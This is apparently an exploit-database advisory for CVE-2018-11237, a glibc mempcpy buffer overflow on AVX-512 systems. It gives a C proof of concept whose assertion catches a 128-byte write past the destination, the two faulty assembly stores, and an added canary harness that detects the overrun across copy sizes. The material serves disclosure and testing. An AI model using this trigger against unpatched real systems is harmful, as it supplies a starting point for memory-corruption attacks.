# Exploit Title: GNU glibc <= 2.27 - Local Buffer Overflow (mempcpy, AVX-512 no-vzeroupper variant)
# Date: 2018-05-24
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: http://www.gnu.org/
# CVE: CVE-2018-11237
# Affected: glibc 2.27 and earlier (fixed in glibc 2.28)

# POC:

$ cat mempcpy.c
#define _GNU_SOURCE 1
#include <string.h>
#include <assert.h>

#define N 97699

char a[N];                       /* source, filled with 'x' */
char b[N+128];                   /* destination plus 128 bytes of zeroed slack */

int main (void)
{
  memset (a, 'x', N);
  char *c = mempcpy (b, a, N);   /* a correct mempcpy returns b + N */
  assert (*c == 0);              /* the byte just past the copy must still be zero */
}

$ gcc -g mempcpy.c -o mempcpy -fno-builtin-mempcpy
$ ./mempcpy
mempcpy: mempcpy.c:14: main: Assertion `*c == 0' failed.

The assertion fails because mempcpy wrote past the N bytes it was asked to copy: `b` is zero-initialised static storage, so `*c` can only be non-zero if the copy overran the destination. `-fno-builtin-mempcpy` stops gcc from replacing the call with its own memcpy expansion, so the routine chosen by glibc's IFUNC resolver is what actually runs; the failure therefore reproduces only on CPUs for which that resolver selects the AVX-512 no-vzeroupper implementation, and the 128 bytes of slack in `b` are what keep the PoC from crashing instead of asserting.

The problem is these two lines in sysdeps/x86_64/multiarch/memmove-avx512-no-vzeroupper.S:

    vmovups %zmm4, (%rax)
    vmovups %zmm5, 0x40(%rax)

For memcpy/memmove, %rax holds the return value, which is the destination pointer, so these stores land inside the buffer. For mempcpy the return value is dest + len, so %rax points to the end of the destination buffer and the two 64-byte ZMM stores write 128 bytes entirely past it. The first of them overwrites the byte `c` points at, which is what the PoC's assertion catches.
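As an added example that is not part of the original advisory and not glibc's own code, the harness below generalises the PoC into a guard-region check: for each copy size it calls the real libc mempcpy through a volatile function pointer (so no compiler flag is needed to keep gcc from inlining it), then verifies that the return value is dst + n, that the body was copied, and that none of the canary bytes after the destination changed. The size list, the guard length (256 bytes), and the canary value (0xA5) are choices made here, not values from the advisory; on a fixed or non-AVX-512 system every size reports zero clobbered bytes.

```c
/* Added example (not the advisory's or glibc's code): a guard-region
 * harness that generalises the mempcpy PoC to several copy sizes.
 * GUARD, CANARY and the size list are assumptions chosen here. */
#define _GNU_SOURCE 1
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Explicit prototype in case a feature-test macro was not seen in time. */
extern void *mempcpy(void *dst, const void *src, size_t n);

#define GUARD  256          /* canary bytes placed after the destination */
#define FILL   'x'          /* source byte, as in the PoC */
#define CANARY 0xA5         /* guard pattern, distinct from FILL and from 0 */

struct probe {
    int  ret_ok;            /* 1 if mempcpy returned dst + n */
    int  body_ok;           /* 1 if dst[0..n) equals the source */
    long clobbered;         /* canary bytes overwritten (0 when fixed) */
    long first_bad;         /* offset past dst + n of the first one, -1 if none */
};

/* Calling through a volatile pointer forces a real call into libc, which
 * is what -fno-builtin-mempcpy achieves for the PoC; the IFUNC-selected
 * implementation is therefore what gets exercised. */
static void *(*volatile real_mempcpy)(void *, const void *, size_t) = mempcpy;

/* Copy n bytes with mempcpy into a buffer followed by GUARD canary bytes
 * and report what happened to the return value and the canary. */
struct probe probe_mempcpy(size_t n)
{
    struct probe p = { 0, 0, 0, -1 };
    unsigned char *src = malloc(n + 1);          /* +1 keeps n == 0 valid */
    unsigned char *dst = malloc(n + GUARD);
    if (!src || !dst) {
        free(src);
        free(dst);
        return p;                                 /* counts as a failure */
    }
    memset(src, FILL, n);
    memset(dst, 0, n);
    memset(dst + n, CANARY, GUARD);

    unsigned char *end = real_mempcpy(dst, src, n);

    p.ret_ok  = (end == dst + n);
    p.body_ok = (memcmp(dst, src, n) == 0);
    for (long i = 0; i < GUARD; i++) {
        if (dst[n + i] != CANARY) {
            if (p.first_bad < 0)
                p.first_bad = i;
            p.clobbered++;
        }
    }
    free(src);
    free(dst);
    return p;
}

/* Probe every size in the list, print a line per size, and return how
 * many sizes failed any of the three checks. */
int count_failures(const size_t *sizes, int count)
{
    int failures = 0;
    for (int i = 0; i < count; i++) {
        struct probe p = probe_mempcpy(sizes[i]);
        int ok = p.ret_ok && p.body_ok && p.clobbered == 0;
        if (!ok)
            failures++;
        printf("n=%-8zu ret=%s body=%s clobbered=%ld first_bad=%ld %s\n",
               sizes[i], p.ret_ok ? "ok" : "BAD", p.body_ok ? "ok" : "BAD",
               p.clobbered, p.first_bad, ok ? "" : "<-- OVERRUN");
    }
    return failures;
}

int main(void)
{
    /* Small sizes take the short paths; the large ones, including the
     * advisory's 97699, reach the block-copy loop where the bug lives. */
    static const size_t sizes[] = { 0, 1, 63, 64, 65, 4096, 65536, 97699, 1 << 20 };
    int failed = count_failures(sizes, (int)(sizeof sizes / sizeof sizes[0]));
    printf("%d size(s) overran the destination\n", failed);
    return failed ? 1 : 0;
}
```

Build it with plain `gcc -O2 harness.c -o harness` and run it on the machine under test: a non-zero exit status, together with a `first_bad=0` line for the large sizes, is the signature of the two misplaced ZMM stores, since the overrun begins exactly at dst + n.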